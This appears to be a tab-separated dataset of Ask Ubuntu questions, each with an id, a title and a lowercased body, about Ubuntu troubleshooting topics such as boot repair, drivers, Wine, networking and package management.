369430	online accounts auth over and over again without success	i just added my google account to the `` online accounts '' in gnome . before my last restart the account could n't be added for unknown reason . i authorized gnome access to my google account , the window closed and nothing happened . now i authorized ubuntu access to my google account which worked well : but i can not open the gnome online accounts even when i delete every online account : it 's icon show up that it is loading in the dash but then suddenly disappears without any message . how to debug that ? what can i do ?
369434	programs `` auto-locking '' to launcher	i upgraded from 12.04 lts to 13.10 , with do-release-upgrade , and ever since then , i have had issues with programs staying in the launcher without locking them there . is this intended ? if so , how do i shut it off ? thanks !
369438	calibration values changing after reboot in ubuntu 12.04.3 lts	i am using beaglebone black board with ubuntu 12.04.3 lts . i have a edt-5.7 '' -wvga lcd with touch . lcd is properly working with this setup . lcd touch is also working properly . but each time i need to calibrate for proper touch . also i tried to stored values in /usr/share/x11/xorg.conf.d/10-evdev.conf but after reboot i am getting lost of touch calibration . and after recalibration values of calibration also changing . i am getting following values after reboot : xmin xmax ymin ymax 1 . 163 3941 238 3872 2 . 97 4006 77 3850 3 . 125 4046 308 4070 4 . 84 3958 42 3909 5 . 144 3957 88 3982 6 . 51 3990 44 3804 7.-63 3834 -3 3803 how can i resolve this problem ? ?
369442	not working pulseaudio = no audio ?	i have one question . for my thesis i need to install last version of bluez , since i need to work with bluetooth low energy and i found that main reason why bluez 5.x is not in ubuntu is current incompatibility with pulseaudio . so i want to ask , what would happen when i would install new bluez ? does that incompatibility mean that the sound would not work ? or just some features which are supplied from pulseaudio would not work ( audio streaming etc . ) , or just features related to bluetooth would not work ? or do you have some suggestion about this , please ? thanks for answer !
369444	dual boot with windows	i installed ubuntu 13.04 in my laptop previously , before upgrading to 13.10 with livecd.i have also windows os which is installed in another partion . but when 13.10 was being installed , my sister switched off the computer.due to this grub was broken.it showed me that a file having extension '.mod ' was missing ( sorry i cant remember properly , but the file was in /boot or somewhere ) . below that i saw 'grub rescue > '.so i decided to reinstall 13.10 and i was successful . now 'grub 2 ' menu is working properly but it shows me only two options - ubuntu and advanced options for ubuntu.options like windows7 ( loader ) , windows vista ( loader ) are missing which i was able to see when using 13.04.so , now i ca n't boot into windows 7 . i also ran boot repair with recommended repair , but it did not work . the boot repair paste can be found at http : //paste.ubuntu.com/6339275/ also i want to know if there is any option to set boot entries under grub 2 manually . and sorry for the grammatical error ( s ) in my lines . ( if any ) .
369447	ubuntu live cd wont boot from old machine	i trying to install ubuntu 12.04.3 on a ( not super old ) old laptop . when i boot from the cd it just displays a black screen with a _ blinking at the top . i have installed ubuntu before but this has never happened . after that it boots into windows vista : ( its a toshiba with 1gb ram but i dont know more about the computer as i got it only to replace windows with ubuntu . help will be appreciated ! : ) update : i checked the md5sum and its correct . update 2 : problem ( half ) solved ! i used a usb and it worked but ill keep what is here for reference if anyone needs it ! : )
369448	how to configure pppoe in ubuntu under wired connection not dsl	i have isp who gave me username , password , and authentication type for ppoe and provide ethernet cable wire home to home for accessing internet . now my problem is how to configure it for wired connection . i must tell you my isp is not dsl or adsl but ethernet as i mentioned earlier , so when i look for pppoe setting under wired connection it is n't there but i can find that option under dsl which ask for username and password and authentication type for identifying user . like in windows under control panel\all control panel items\network and sharing center when we choose the option of set up a new connection or network then the option of broadband ( pppoe ) connect using dsl or cable that requires a user name and password and ther we go done in window but where does this option comes in ubuntu . please help me out , what am i should i do because i tried with all the inputs under dsl also and when i connect the link never establishes so please help . it would really be appreciative . thanks a lot in advance .
369449	unity system details shows that my driver is unknown , is there a way to fix this ?	on running ubuntu 12.10 through hard disk installation , the `` details '' app shows that graphics driver is unknown , as shown in the following image . but when running an ubuntu live usb , which contains ubuntu 13.04 , it shows that a driver is present so , from this i think that i need to install the driver for corresponding graphics card , but i do n't know how to . btw my previous experiences with drivers are not good ( when i was using windows xp ) , so i really need some help . this is the output of the command glxinfo | grep render .
369455	unknown file system , grub rescue	have a fully encrypted drive , after running an update boots into grub rescue . booted to a ubuntu live cd , downloaded boot repair fix , said successful but did n't work . here is the log any help is appreciated .
369458	kubuntu 13.10 - backintime-kde do not start	i have a kubuntu 13.10 64bit fresh install . i installed backintime and backintime-kde4 when i launch backintime-kde4 it crashes saying : mirto @ msb03 : ~/script $ backintime-kde4 back in time version : 1.0.10 back in time comes with absolutely no warranty . this is free software , and you are welcome to redistribute it under certain conditions ; type `backintime-kde4 -- license ' for details . traceback ( most recent call last ) : file `` /usr/share/backintime/kde4/app.py '' , line 1136 , in < module > main_window = mainwindow ( cfg , app_instance , kapp , kaboutdata ) file `` /usr/share/backintime/kde4/app.py '' , line 237 , in __init__ self.list_files_view_model.removecolumns ( 3 , 2 ) typeerror : kdirmodel.removecolumns ( ) is a private method what can i do ?
369459	ralink rt3290 problems	basically this question is related to how do i get a ralink rt3290 wireless card working ? but i have no reputation to comment there . answer in mentioned question successfully get me through driver installation . but then whenever i enable wifi and disconnect ethernet ( so i assume only when traffic starts going through this connection ) i get kernel panic error . how to deal with it ? edit : sorry , i was gon na add more info , but apparently messed up . release 13.10 amd64 could n't find smarter way , than just a photo of my screen
369460	blacklisting roccat module	i want the hid_roccat_ryos to not load under kernel 3.8.0 . i could blacklist the mouse module hid_roccat_kovaplus successfully , but the ryos module , which prevents any external keyboard from working , ca n't be blacklisted . i wrote into the blacklist-roccat.conf the following lines : blacklist hid_roccat_ryos # blacklist hid_roccat_kovaplus and i cleared the `` modprobe dependencies '' in the initramfs afterwards sudo update-initramfs -u what else can be done ? maybe a hook or a file loads the module ?
369462	gcc problem - > stdio.h not found	i have to compile one programme . theoretically i need just to change the two path ... can you help me ? makefile # original # cc=arm-1136jf_s_r1_vfp_hard_float-linux-gnueabi-gcc # cflags= -o3 -ffunction-sections -fdata-sections -- sysroot=/home/mguivarch/desktop/buildroot-2011.08-advansee/build/staging/ # ldflags= -wl , -- gc-sections -lpthread -lrt -lm -l/home/mguivarch/desktop/buildroot-2011.08-advansee/build/staging/usr/lib # change i made cc=gcc cflags= -o3 -ffunction-sections -fdata-sections -- sysroot=/home/mihai/desktop/mipsee/programme ldflags= -wl , -- gc-sections -lpthread -lrt -lm -l/usr/include exec=livic_sync all : $ ( exec ) livic_sync : capture.o main.o clienttcp.o $ ( cc ) -o livic_sync capture.o main.o clienttcp.o $ ( ldflags ) clienttcp.o : clienttcp.c main.h $ ( cc ) -o clienttcp.o -c clienttcp.c $ ( cflags ) capture.o : capture.c clienttcp.h $ ( cc ) -o capture.o -c capture.c $ ( cflags ) main.o : main.c capture.h $ ( cc ) -o main.o -c main.c $ ( cflags ) clean : rm *.o mrproper : clean rm $ ( exec ) vpro : ~/desktop/mipsee/programme $ make gcc -o capture.o -c capture.c -o3 -ffunction-sections -fdata-sections -- sysroot=/home /mihai/desktop/mipsee/programme capture.c:9:19 : fatal error : stdio.h : no such file or directory compilation terminated . make : * [ capture.o ] error 1 : ~/desktop/mipsee/programme $ ls -l total 216 -rw-r -- r -- 1 mihai mihai 15905 oct 30 19:34 capture.c -rw-r -- r -- 1 mihai mihai 453 jul 17 2012 capture.h -rw-r -- r -- 1 mihai mihai 3228 jul 18 2012 clienttcp.c -rw-r -- r -- 1 mihai mihai 217 sep 13 2012 clienttcp.h -rw-r -- r -- 1 mihai mihai 948 feb 10 2012 clientudp.c -rw-r -- r -- 1 mihai mihai 141 feb 9 2012 clientudp.h drwxrwxr-x 18 mihai mihai 4096 nov 1 10:11 html -rw-r -- r -- 1 mihai mihai 6459 oct 30 19:31 main.c -rw-r -- r -- 1 mihai mihai 1374 jun 21 2012 main.h -rw-r -- r -- 1 mihai mihai 865 nov 1 12:46 makefile -rw-r -- r -- 1 mihai mihai 870 nov 1 12:30 makefile~ -rw-rw-r -- 1 mihai mihai 75566 nov 1 10:11 mihaidoxygenconfig -rw-rw-r -- 1 mihai mihai 75568 oct 30 14:57 mihaidoxygenconfig~ drwxr-xr-x 3 mihai mihai 4096 oct 30 19:55 mipsee : ~/desktop/mipsee/programme $ : ~/desktop/mipsee/programme $ locate stdio.h /usr/include/stdio.h /usr/include/boost/iostreams/filter/stdio.hpp /usr/include/c++/4.6/tr1/stdio.h /usr/include/glib-2.0/glib/gstdio.h /usr/include/i386-linux-gnu/bits/stdio.h /usr/include/unicode/ustdio.h /usr/lib/perl/5.14.2/core/nostdio.h /usr/lib/syslinux/com32/include/stdio.h
369466	memory usage statistics different in free and htop	when i run free -m on my command-line , it shows my used memory as show below . when i run htop the used memory shown is very low . why is that ? is it some other kind of representation ? i am new to linux . so i am totally blank on these stuff . total 3 used free shared buffers cached 5863 4980 882 0 903 3025 htop : mem [ ||||| # # # # # *****1076/586 ] the used memory in free shows 4980mb and in htop shows 1076mb . what do they actually represent ?
369469	start wine program using nvidia video card	i recent have installed adobe photoshop cs6 using wine . if i run in terminal optirun wine '' c : \program files ( x86 ) \adobe\adobe photoshop cs6\photoshop.exe '' i get the next errors : vas @ lenovoz580 : ~ $ optirun wine `` c : \program files ( x86 ) \adobe\adobe photoshop cs6\photoshop.exe '' err : module : attach_process_dlls `` msvcp90.dll '' failed to initialize , aborting err : module : ldrinitializethunk main exe initialization for l '' c : \\program files ( x86 ) \\adobe\\adobe photoshop cs6\\photoshop.exe '' failed , status c0000005 if i try without optirun the program starts . i use ubuntu 13.04 and wine 1.4 . can i start windows programs with wine using nvidia discrete video card ?
369470	how to write *.dmg throught ubuntu ?	my macbook 's hard has formated and it 's mac totaly removed , i downloaded the image of mac , it 's type is dmg but i cant write it to dvd in my ubuntu to reinstall in my notebook is there any program that write mac bootable image ( dmg ) ?
369471	lubuntu vm broken - x does not start and tty 's do not allow commands	i 'm running lubuntu 12.04 in a vm under vmware on windows 7 . after the last reboot , my x does not start , and any attempts to log in to tty 's result in no command prompt being opened . is there anyway i can get a tty running to start troubleshooting ? i 'm quite stumped here as i cant really interact with the operating system at all .
369472	get rid of mac os x partition on dual boot	first time posting on askubuntu . i am new to ubuntu/linux and i have a macbook pro . i have finally got the dual boot to work . my laptop is a little older so it only has a 250gb hard drive . i am running the 64bit ubuntu 12.04 . i really want to just transition to ubuntu and get rid of mac os x so i can fully immerse myself to learn it . what is holding me back is itunes . i have a iphone and i use itunes to manage my music and what not . i have read a little that rhythmbox can manage iphone music , but i do n't know if it would work with ios 7 . i am trying to learn linux because i am trying to make it in the information security field and i know a lot of security functions come from linux . my question is ... how can i make my mac os partition smaller ( just enough to keep itunes + my 80gb of music + a little room to keep adding music ) and dedicate the new free/unallocated space to my ubuntu os ? i am sure that you would use gpartition to do this , but i have no idea how to do it . nor do i want to do a fresh install , because it took a while to figure out which drivers i needed to get the nvidia drivers to work ; i have already set up my ubuntu 12.04 and like my setup . does anyone have a iphone and manage the music successfully using ubuntu ? hopefully someone on here can help ! thanks !
369473	reset or completely remove an installation/htop	i usually use htop in tty when i need to kill a program ... or whatever hangs or slows down my pc , now i screwed it up . i tried making changes in htop from the 'setup ' option which is accessed by pressing f2 key , and by mistake filled the screen and now i ca n't see a single process and ca n't even delete the widget or the process viewer ( whatever it is called ) from the screen as my screen is filled and ca n't see any options to delete them. ! [ this is how my screen looks now in fullscreen terminal window , ca n't be scrolled so ca n't view other options to delete them ] [ 1 ] here 's the screenshot : http : //postimg.org/image/ez8k1f8c3/ i 've tried sudo apt-get remove -- purge htop and sudo apt-get remove htop also 'completely remove ' from synaptic manager , but no success as the settings remain on the pc even after removing the package . any way by which i could re-install it by completely removing it 's whole settings or options by which i could remove those widgets off screen ?
369478	why fixed address assigned to dhcp server does n't work ?	i have an ubuntu server that runs dhcp server . dhcp server works good normally , but when i want to assign fixed ip address for my clients , it does n't work . my codes in dhcp server in dhcpd.conf look like : sxalid-s - > my client name host sxalid-s { hardware ethernet 08:00:27:5e : ce : d8 ; fixed-address 192.168.1.9 ; } my subnet declaration : subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.10 192.168.1.20 ; option routers 192.168.1.0 ; } my sxalid-s client before i assign fixed address give 192.168.1.12 but now when i down that interface and up it again give again 192.168.1.12 i try # dhclient but it does not work ! i want no more configuration except the default configuration . can anybody help me how solve this problem ?
369479	overheating problems causing ubuntu 13.10 to power off .	i 'm using lenovo z370 laptop and i made a dual boot with windows 7 and ubuntu 13.10 . i noticed that since i started using ubuntu 13.10 my laptop frequently overheats and it powers off because of the excess heat . any explanation ? thank you so much ... noland
369480	unable to boot from ubuntu 13.10 dvd or usb after windows 8.1 update	after updating to windows 8.1 from windows 8 today via the windows store i am no longer able to boot the ubuntu 13.10 usb or dvd . selecting the boot order via the bios appears to attempt to read the dvd or usb but then just boots into windows . prior to the update i was running a dual boot ubuntu 12.10 window 8 machine on a toshiba satellite p850-31l . i was prepared for the system not booting or not booting into ubuntu after the update by making sure i had a bootable ubuntu usb and dvd handy . i tested the usb and it worked perfectly . after the update it did not . has microsoft updated their secure boot signing key as part of the update or something which means ubuntu is longer recognised ? note that it is not possible to turn off secure boot on the bios 6.70 version on this laptop . i also posted to the toshiba support forum and will update here with anything useful .
369481	how to increase evernote 's gui font size ?	i 'm running evernote using playonlinux ( wine ) . when i scale the font using the wine configuration ( to 140 dpi for example ) , the font of notes increases but the gui font of evernote is too small . i tried using different wine versions but with no success . also tried installing new themes and setting the font size there to large/extra large , but unfortunately nothing worked . any ideas how to increase evernote 's gui font size ? here 's my current setup : ubuntu 13.10 playonlinux 4.2.1 wine 1.7.5 evernote 5.0.3.1614 ( 269614 ) public any help would be appreciated !
369486	i added a hard drive now it will not boot	well i added a new hard drive to my ubuntu server 12.04 and when i turned it off and now it will not boot . i check my bios and it tried booting from both the hard drives and none of them will boot . thanks !
369487	ubuntu starting problem ?	i finished installing ubuntu studio 13.10 in my dell inspiron . i already have windows 8 preinstalled in the system . the problem now is ... i can only log into ubuntu when i change the boot setting to legacy bios , and to windows in uefi safe mode . there is no option to choose the desired operating system when the computer boots . please help .
369488	windows 7/ubuntu does not boot after installation .	i installed ubuntu on windows 7 now neither os boots up . how can i recover windows os and uninstall ubuntu ?
369491	ubuntu server 13 hangs on boot , help ?	all that appears on the screen is the blinking cursor , and it never seems to go away . i am pretty sure this may be a permissions problem . the reason i suspect this , is before the problem occured i had change the owner of the /home directory . ( i was debugging an ftp issue at the time ) i forgot to reset the owner back to root before restarting though . and ever since , it has not successfully booted . the command i used : chown -r ftpuser : users /home for some stupid reason i decided it was a good idea to have this set at startup so it is in /etc/rc.local as well . normally i would just change the perms back in recoverymode , but it seems i ca n't get there ( esc & left shift are n't working ) . any ideas what this could be , or how i could fix it ? p.s . for more fun , the system was setup in raid1 , so mounting it while in a live cd is extra tricky .
369494	how to check the battery temperature of laptop ? how do i know the normal temperature of it ?	how to check battery temperature ? how do i know the normal temperature of it ? my os is ubuntu . my laptop is lenovo g470 . thanks in advance !
369495	display is breaking up	software loaded ok from cd onto a clean , brand new hard drive . log in screen is ok. once i log in and highlight anything on the left hand side menu the display breaks up and is unreadable ( bit like a poor freeview reception during a storm ) . machine is dell inspiron 531 amd dual core 32bit . tried ubuntu as windows vista kept freezing all the time . tried installing and uninstalling vista about 4 times before trying xp , which seems to work ok .
369498	how to run script automatically on each login to unity ( ubuntu 12.04 ) ?	i 'm using dual monitor configuration ( laptop + external crt ) . each time i lock my screen i need to restore my crt screen parameters ( actually refresh rate only ) on next unlock . screen refresh rate of external monitor is reset to 60hz and desktop picture moved ( or better to say compressed ) to left creating black zone right . i 'm running following command to restore correct parameters xrandr -- output vga-0 -- mode 1280x1024 -r 75 i need to run this script each time i 'm unlocking my screen and it would be nice to make this happening automatically . startup applications wo n't help as they run once only during system boot . another solution is to save those vga parameters somewhere but i 'm not sure how . probably in /etc/x11/xorg.conf ( which actually do n't have ) but i need to generate full config first and then put that 75 rate in it . update i ca n't understand why was this marked as duplicate of another question where in the description a man says `` ... upon boot ? ( not upon user login ) '' and my question is inverted - `` upon login ( not upon boot ) '' . also i mentioned that putting a script to `` startup applications '' does not do the trick .
369499	can you have debs without compression ?	i 'm in the middle of doing an upgrade on a really slow machine . it 's an intel atom that 's a few years old . it 's perfect for watching video and using xbmc but it really honks at decompressing hundreds of updates ( like you do in a release upgrade ) . i 've got another upgrade to do on this once this one completes . i mused to the general chat room today that it would be cool if i could proxy those package downloads through a faster local server that could proxy the requests , decompress the packages and pass them on . so still in planning , i have a few questions : is is possible to have a deb package that is n't compressed ? how can i remove the compression from a deb ? will removing the compression knacker the checksums and if so , how do i fix that ?
369500	how do i make home and end work in putty ssh with fish shell ?	years ago , an ubuntu update broke this and i 've never found a solution . i have fish as my default shell . ubuntu 12.10 locally ( gnome terminal ) , home and end keys work fine in both fish and bash . when i log in by ssh using putty , then run bash , home and end work fine inside of bash . however , when i log in by ssh using putty , in the default fish shell , pressing home key produces [ 1~ ( sometimes erasing the line , sometimes not ) . when i press end , it produces [ 4~ . if i use the default fish shell in bitvise ssh client , home and end work correctly . how do i get home and end to work correctly ?
369502	bacula job is giving back a restore ok message but nothing is restored	i want to restore one of my client that runs linux ubuntu server . i tried to restore the client but it gave me the response that the restore is finished and its ok . i then went to the destination directory but there was nothing meaning nothing was installed . anyone knows what is happening please help
369503	reason why unetbootin 494 is n't booting in 13.10	i need particular unetbootin version to create my ntfs windows pendrive . anyway , the most recent version installed via application center does n't support ntfs , and on the internets people are saying that latest working version is 494 . so i downloaded it ( http : //sourceforge.net/projects/unetbootin/files/unetbootin/494/ - 4th file ) , used chmod +x ( it allows to execute binary files in linux , yeah ? ) and then tried to run it . on doubleclick nothing happens , so i tried running it from console ( with sudo ) - nothing happens either . ubuntu gnome 13.10 x64 if there is n't a solution to this - which other program can i use to write my windows image to ntfs pendrive ?
369505	kde : how can i select audio output device for mplayer ?	i recently installed kubuntu 13.10 64-bit , and i 'm having a problem with selecting audio output device . in phonon , when i select audio device preference order and press apply , amarok and dragon will immediately switch to the preferred device . vlc and smplayer are not affected . vlc has its own setting for selecting the output device , but smplayer remains a problem . it always plays audio on internal audio , and i ca n't change output to hdmi . how can i select hdmi for smplayer 's audio output device ? i do n't know if it matters , but when i select hdmi audio in phonon and click test , the test sound plays on the internal audio output as well . in the hardware settings tab , the front left and front right test buttons play audio on hdmi . also , volume up/down buttons affect hdmi volume when smplayer is focused . this would make sense if i could get smplayer to play audio over hdmi , but it would be better if the volume keys affected smplayer 's own volume , or the `` mplayer2 : audio stream '' which appears in volume control while mplayer is playing . edit : i 've recompiled mplayer with alsa support , and can now select the audio output device from smplayer 's settings . did n't affect the issue with phonon of course , but it 's a suitable workaround .
369506	is it possible to upgrade a machine remotely using local system resources ?	i 'm doing an upgrade on a little intel atom `` nettop '' . it 's extremely slow and takes somewhere around an hour to do a release upgrade . i 'm looking to improve that . this question follows a slightly different idea from my last one : can you have debs without compression ? my desktop is a beast . it 's not but it 's more powerful than several dozen atoms . it 's also on the same gigabit network as the nettop . would the following be possible over ssh/nfs/whatever : mount the remote system to something local ( eg /mnt/ ) using nfs or something else mount local resource over the top ( eg /proc/ , /sys/ , et al ) chroot into /mnt/ perform an upgrade using command line tools . what i 'm describing is similar to ( and very much inspired by ) chrooting to restore grub . something i 've suggested a few times and have performed more than once . it works for grub but would it work for a remote system ? what problems am i likely to run into ? is the system going to grab the right updates ( nettop is 32bit , desktop is 64bit ) ? is the fact this is a live system going to interfere with the upgrades ? am i just being silly ? should i just to a normal upgrade ?
369508	ntfs permissions	i 'm running ubuntu 13.10 x86_64 and i have modified /etc/fstab to mount my ntfs hdd with permissions but i 'm getting some permissions errors because the owner is `` root '' instead of my user . thanks in advance p.s : i had no problems doing this in ubuntu 13.04 32bits edit : fstab content : # /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=3e857b61-2d2b-469a-a3eb-de1cf4d5130a / ext4 errors=remount-ro 0 # /home was on /dev/sda7 during installation # uuid=14887804-6799-443e-955f-6b2872cd441a /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation # uuid=2da59282-61ee-40d2-821b-2042ff556748 none swap sw 0 0 # uuid=4a1499c11499b085 /media/ivykoko/269gb ntfs umask=0000 , utf8 0 0
369511	ubuntu on hp pavillion smart touch 11	i try to install ubuntu 13.10 on my hp smart touch , but even trying ubuntu is impossible as when it starts after the ubuntu logo and loading dots there is only a black screen from where nothing happens .
369516	multi-touch mouse gestures in ubuntu 13.10 ?	i have ubuntu 13.10 and windows 8 installed as dual boot . there is a mousepad specific driver in windows 8 that lets me use multi-touch gestures such as two finger swipe to go back/forward , pinch to zoom in/out , and pivot rotate . the driver/touchpad is made by alps . but on ubuntu 13.10 there is no multi-touch support like those i can use on windows . how can i get the same mouse gestures on windows to work on ubuntu 13.10 ?
369517	gnome shell with very high cpu usage	i 'm running ubuntu gnome 13.10 on my dell latiude e6510 with a i5 m560 . the i5 comes with a embedded intel hd 3400 graphics . the average cpu usage of the gnome-shell is by 160 % it 's to high , i think . is there a problem with a driver ? if i call the command glxinfo | grep opengl it returns : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) opengl version string : 2.1 mesa 9.2.1 opengl shading language version string : 1.30 opengl extensions : greetings
369519	13.10 - is it possible to revert keyboard-related software to 13.04 ?	i 've been hopelessly trying to get ibus to play nice with 13.10 's updated input method application chain . i tried just using ibus as the default input method , but when i try to change keyboard shortcuts i end up with this i do n't know if its relevant but i did apply the solution to this question to try and fix a related keyboard issue . what 's more , whether or not i use ibus as an input style ( as definied in the `` languages and region '' panel ) , when anthy is activated it does n't seem to capture any of the keyboard commands . i feel like i have completely broken every aspect of keyboard management in my ubuntu install , so i have two questions : would it be possible to revert the keyboard stuff to 13.04 management ? what would i need to do to bring my keyboard stuff back to a `` vanilla '' 13.10 install 's config ? i 'm surprised at how broken the keyboard management became in 13.10 . i do n't understand why they 'd break things as fundamental as keyboard shortcuts for no noticeable gains .
369520	stable ubuntu required for samsung galaxy note 2 ?	guyz can you please get me the stable version of ubuntu for my samsung galaxy note 2 . i like using ubuntu alot and that would be great if i can use it to my samsung note 2 , please reply me as soon as possible . regards , uzair jawed didx sales
369521	installing problems on dell	i used unetbootin to have a usb boot of an iso disk image ubuntu 12.04 i836 . when i plugged my usb in and turn on the power & got into the bootmenu , i chose install ubuntu , after some seconds it appears a line underneath saying ( approximate recall ) : '' ... temperature exceeding ( 88*f ) ... '' but it was in anyway and i got to choose the language and proceeded into the setup for a little bit and then it shows a really fast screen saying something with `` ... terminating all process ... '' and then the computer shuts down . more information , i 'm using dell n5010 . i had successfully installed ubuntu through the same unetbootin with the same version of ubuntu , until one day when i boot into this os it has an error and the operating system just ... corrupts and i had to delete the files in the drive i 've installed it whilst in windows .
369526	why my ubuntu server do n't get ip address for eth1 for access to internet	i install ubuntu server in virtualbox with two adapters : adapter1 : attached to : internal network name : eth0 adapter2 : attached to : lan both are cable connected . now i run ubuntu server that dhcp running on it . eth0 give static ip address that myself assign to it . but eth1 not give any address from virtualbox . i run ubuntu desktop in virtualbox that have same network setting . eth0 ubuntu desktop give ip address from my ubuntu server and eth1 give ip address from virtualbox so i 'm access to internet . i want to access to internet from ubuntu server but eth1 not give any ip address . i try to attach adapter2 to bridge network and name : wlan0 but not work . i try dhclient in ubuntu server for renew ip address but still do n't work . how can i fix this problem ?
369528	booting ubuntu 13.10 from usb on server with no os ( dell poweredge t110 )	i have a dell poweredge t110 ( xeon 1220v2 ) server with no os . from my mac , i was able to save the ubuntu 13.10 for server iso ( x86 ) and used unetbootin to save the iso to a usb stick ( 2gb ) . i was hoping to boot the server from usb , and all seemed to be going well , bios even detected my usb drive when i plugged it in , but for some reason i 'm getting a `` missing operating system '' error . i checked the usb drive and it appears that unetbootin put the correct files on it form a cursory glance ( although i 'm not entirely sure what i should be looking for ) . should i be able to boot a server with no os from a unetbootin created ubuntu 13.10 usb ? and if so , why might bios not find the right files ? i had read that there is a usb emulation setting in bios , but i have n't been able to find this in the menus . my understanding is that by default , this is set to on . i might try wiping the usb stick and running unetbootin again . the usb is formatted to ms-dos fat16 ( should it be formatted some other way ? ) .
369535	menu bar notifications are stuck	so there is that corner with notifications in the menu bar that displays time , language and other stuff . it got stuck the time is not updated and when i switch the language it 's not reflected .
369536	how to run wow ?	actualy i 'm new with wine i just need more time to get it , but unitl this day come i want to play on world of warcraft on ubuntu , but the problem it 's the folder containing wow is not with windows partition so how to make wine run it . my ubunto is 13.10 disk partition : -sda2 : windows ( ntfs ) -sda3 : ubunto ( ext4 ) -sda4 : documents ( ntfs ) //wow folder is here . thx for help .
369538	how to change the disk partition for ubuntu ?	after installing ubuntu can i move it to use a different disk space ?
369541	ubuntu certified hardware hp microserver g7 n54l	why is the hp microserver g7 n54l not on the ubuntu certified hardware list ?
369542	how to run software , that is not offered though package managers , that requires ia32-libs	i 'm trying to install the arma 2 oa dedicated server on a virtualbox vm so i can test my own missions in a sandbox environment in a way that lets me offload them to another computer in my network . ( the other computer is running the vm , but it 's a windows machine , and i did n't want to hassle with its installation ) it needs at least 2 , and preferably 4gb of ram , so i thought i would install the amd64 version of ubuntu 13.10 to get this going . 'how do you run a 32-bit program on a 64-bit version of ubuntu ? ' already explained how to install 32bit software though apt-get and/or dpkg , but that does n't apply in this case . the server is offered as a compressed download on the site of bi studio , the developer of the arma games . its installation instructions are obviously slightly out of date with the current state of the art . ( probably because the state of the art has been updated quite recently : ) ) it states that i have to install ia32-libs , which has now apparently been deprecated . now i have to find out how to get the right packages installed to make sure that it will run . my experience level is like novice-intermediate when it comes to these issues . i 've installed a lot of packages though apt-get ; i 've solved dependency issues in the past ; i have n't installed much software without using package managers . i can handle myself with basic administrative work like editing conf files and such . i have just gone ahead and tried to install it without installing ia32-libs through apt-get but to install gcc to get the libs after all . my reasoning being that gcc will include the files for backward compatibility coding and on linux all libs are ( as far as i can tell ) installed at a system level in /libs . so far it seems to start up . ( i can connect with the game server trough my in-game network browser , so it 's communicating ) i 'm not sure if there 's any dependency checking going on when running the game server program , so i 'm left with a couple of questions : does 13.10 catch any calls to ia32libs libraries and translate the calls to the right code on amd64 ? if it runs , does that mean that all required libraries have been loaded correctly , or is there a chance of it crashing later on when a library that was needed is missing after all ? is it necessary to do a workaround such as installing gcc ? ( along with its i386 libs ) how do i find out what libraries i might need to run this software ? ( or any other piece of 32-bit software that is n't offered through a package manager )
369544	what is `` computer : // '' path in nautilus and how to access it as root ?	i am curious what computer : // is , in terms of its implementation on the file system/in the nautilus executable/as a configuration provided to nautilus ? perhaps it is a configurable group ( of paths ) for nautilus , configurable on a user basis . the reason i ask is because it is not accessible with root 's nautilus . if # 1 is correct , how does one create computer : // and/or how does one create such path groups ?
369547	how to map a network drive	i hope someone can help me.. i 'm trying to connect with my university remote filestore , but i ca n't make it work.. here is explained what to do on windows or mac , and here i found a guide about how to do it with ubuntu , but it 's not working to me ( at the end of all the steps , i ca n't access to the mounted folder ) . i can access to the storage through konqueror ( i 'm using kde ) , but i would like to access to it also without it . any suggestion ?
369553	cinnamon desktop environment with ubuntu 13.10	i am using ubuntu 13.10 with the cinnamon desktop environment ( not gnome or unity environment ) and when i click on `` menu '' and click on `` quit '' , only cancel appears . there is no `` shutdown '' or `` restart '' or `` hibernate '' options ! all were present in ubuntu 13.04 with cinnamon , but not now in ubuntu 13.10 with cinnamon ! how can i get those buttons back please ? thank you very much ! ! !
369554	can not install minicom on 12.0.4 lts	i can not install minicom on 12.0.4 lts . i get `` package 'minicom ' has no installation candidate ' is this because /etc/apt/sources.list is old ?
369557	can i install ubuntu in ainol novo 10 captain ?	dear sir/madam i have ainol novo 10 captain quad core tablet with android 4.2 jelly bean preinstalled in it . i want to install ubuntu in my tablet , can i do that ? if yes , then what is the procedure . thanx zeshan ch .
369558	after installing ubuntu 13.04 , the unity desktop lacks multiple components and networking fails	i 'm new to ubuntu . i installed ubuntu 13.04 in my desktop . my pc 's configuration is intel 2.4 ghz intel 845 motherboard ram 768 mb . after successful installation of ubuntu 13.04 , i logged into it , after logging in only default wallpaper is visible , there is no task bar , and no icons . it does not recognize the usb network adapter and therefore there is no internet connection . terminal can only be started by pressing ctrl+alt+t . how may i solve these problems ?
369564	||| new to ubuntu + need help | quantal . dualboot . built in linux . toolbar ... .	i have installed ubuntu quantal 12 along with windows it worked fine at start and now the toolbar and most features in ubuntu ( including updates ) are not working and i am only able to use a different linux interface ... fire wall application is not present and i ca n't add any new software upgrading option is only present at start and mostly freezes after short while of use ! what can i do to restore the ( normal ubuntu ) along with toolbar and to update or upgrade ?
369566	problem with sudo apt-get	every time i write the `` sudo apt-get install '' command i egt the following errors . what can i do to solve it ? e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists /packages.medibuntu.org_dists_raring_free_i18n_translation-en e : no se pudieron analizar o abrir las listas de paquetes o el archivo de estado .
369569	ubuntu 12.04 ( gnome classic [ no effects ] ) panel problem	using edit menus i create a new menu named miscellaneous , assign an icon and add several items to it . when i add that menu to a panel with add to panel > application launcher , it appears without any icon on the panel . predefined menus work properly . appearing with the assigned icon . but the same thing happens if i change the name of a predefined menu and then change it back to the original name .
369572	terminal not working properly	i am new to ubuntu and i am using it virtualized on mac ( by virtualbox ) . when i tried a simple command on terminal ( eg . gedit ) i get it open but ... terminal stays stucked . the user @ computer : ~ $ doesn-t appear anymore . the only way is to close gedit application . is that normal ? what am i doing wrong ?
369573	hear sound while typing	i there any way to add a sound when one is typing with keyboard so that the sound is different for different language layouts ?
